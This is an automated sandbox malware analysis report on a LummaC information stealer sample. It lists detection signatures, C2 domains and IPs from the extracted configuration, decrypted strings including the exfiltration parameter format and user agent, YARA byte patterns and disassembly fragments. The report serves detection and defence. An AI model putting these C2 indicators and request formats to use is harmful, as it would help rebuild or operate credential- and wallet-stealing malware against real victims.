Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mmm7GmDcR4.exe

Overview

General Information

Sample name:Mmm7GmDcR4.exe
renamed because original name is a hash value
Original sample name:c4a14694e0fb534e9cbfbff50be90ba3.exe
Analysis ID:1587637
MD5:c4a14694e0fb534e9cbfbff50be90ba3
SHA1:7040e13af97e90812c71c8123612a1aeddb72e1c
SHA256:07816ec07a38281ba2a1bf12ca405b30f57befa02ddf9e1e07a0e0b764db17bc
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Mmm7GmDcR4.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\Mmm7GmDcR4.exe" MD5: C4A14694E0FB534E9CBFBFF50BE90BA3)
    • 3B5A.tmp.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe" MD5: 1B513E6F8721E444A9364DD93630F015)
      • WerFault.exe (PID: 7956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 1792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["chipdonkeruz.shop", "handscreamny.shop", "apporholis.shop", "robinsharez.shop", "soundtappysk.shop", "crowdwarek.shop", "skidjazzyric.click", "versersleep.shop", "femalsabler.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 4 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Mmm7GmDcR4.exe.5609cc.1.unpackWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x3f1ac:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:31.848295+010020283713Unknown Traffic192.168.2.949756104.21.32.1443TCP
        2025-01-10T16:09:32.842826+010020283713Unknown Traffic192.168.2.949762104.21.32.1443TCP
        2025-01-10T16:09:34.173219+010020283713Unknown Traffic192.168.2.949768104.21.32.1443TCP
        2025-01-10T16:09:36.272079+010020283713Unknown Traffic192.168.2.949776104.21.32.1443TCP
        2025-01-10T16:09:38.795249+010020283713Unknown Traffic192.168.2.949784104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:32.322133+010020546531A Network Trojan was detected192.168.2.949756104.21.32.1443TCP
        2025-01-10T16:09:33.372820+010020546531A Network Trojan was detected192.168.2.949762104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:32.322133+010020498361A Network Trojan was detected192.168.2.949756104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:33.372820+010020498121A Network Trojan was detected192.168.2.949762104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:31.848295+010020590891Domain Observed Used for C2 Detected192.168.2.949756104.21.32.1443TCP
        2025-01-10T16:09:32.842826+010020590891Domain Observed Used for C2 Detected192.168.2.949762104.21.32.1443TCP
        2025-01-10T16:09:34.173219+010020590891Domain Observed Used for C2 Detected192.168.2.949768104.21.32.1443TCP
        2025-01-10T16:09:36.272079+010020590891Domain Observed Used for C2 Detected192.168.2.949776104.21.32.1443TCP
        2025-01-10T16:09:38.795249+010020590891Domain Observed Used for C2 Detected192.168.2.949784104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:31.364967+010020590881Domain Observed Used for C2 Detected192.168.2.9632181.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:36.819640+010020480941Malware Command and Control Activity Detected192.168.2.949776104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T16:09:28.195709+010028032742Potentially Bad Traffic192.168.2.949726104.21.56.70443TCP
        2025-01-10T16:09:29.068987+010028032742Potentially Bad Traffic192.168.2.949735176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Mmm7GmDcR4.exeAvira: detected
        Source: https://skidjazzyric.click/apikAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click/d8Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEPAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: 3.3.3B5A.tmp.exe.7b0000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["chipdonkeruz.shop", "handscreamny.shop", "apporholis.shop", "robinsharez.shop", "soundtappysk.shop", "crowdwarek.shop", "skidjazzyric.click", "versersleep.shop", "femalsabler.shop"], "Build id": "4h5VfH--"}
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeReversingLabs: Detection: 42%
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeReversingLabs: Detection: 42%
        Source: Mmm7GmDcR4.exeReversingLabs: Detection: 44%
        Source: Mmm7GmDcR4.exeVirustotal: Detection: 41%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeJoe Sandbox ML: detected
        Source: Mmm7GmDcR4.exeJoe Sandbox ML: detected
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: robinsharez.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: handscreamny.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: versersleep.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: crowdwarek.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: apporholis.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: femalsabler.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: soundtappysk.shop
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: skidjazzyric.click
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00415720 CryptUnprotectData,3_2_00415720

        Compliance

        barindex
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeUnpacked PE file: 0.2.Mmm7GmDcR4.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeUnpacked PE file: 3.2.3B5A.tmp.exe.400000.0.unpack
        Source: Mmm7GmDcR4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.9:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49776 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49784 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02168C49 FindFirstFileExW,0_2_02168C49
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov esi, ecx3_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0040A05C
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042D830
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043F0E0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B882
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp eax3_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B173
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A900
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B184
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then test esi, esi3_2_0043C9A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041B243
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00402210
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040AA32
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00428280
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F2A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042BB00
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041BB21
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AB2A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0040C334
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]3_2_0040C3EC
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp ecx3_2_0040D334
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00440BAB
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov eax, edi3_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B484
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00427490
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438520
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then push edi3_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B652
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B667
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00418672
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409E09
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp ecx3_2_0040CEC7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AEFF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_00408F90
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0076A070
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov esi, ecx3_2_007760EF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0077B166
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0077C148
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00777137
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp ecx3_2_0076D12E
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_007691F7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_007A21EA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0076E249
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0076E249
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0076A2C3
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0079F347
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0077B3EB
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0077B3DA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00762477
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007884E7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0077B4AA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0077F507
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_007825E7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0076C59B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov eax, edi3_2_0077C667
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp ecx3_2_0076D59B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_007876F7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0077B6EB
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007A26D7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_007A0694
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007A0694
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0077773F
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00798787
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00778809
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then push edi3_2_0079C807
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0079C807
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_007758FA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0078B8B5
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00767887
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00767887
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0076BA6C
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_007A2A17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00777AE4
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00777AE4
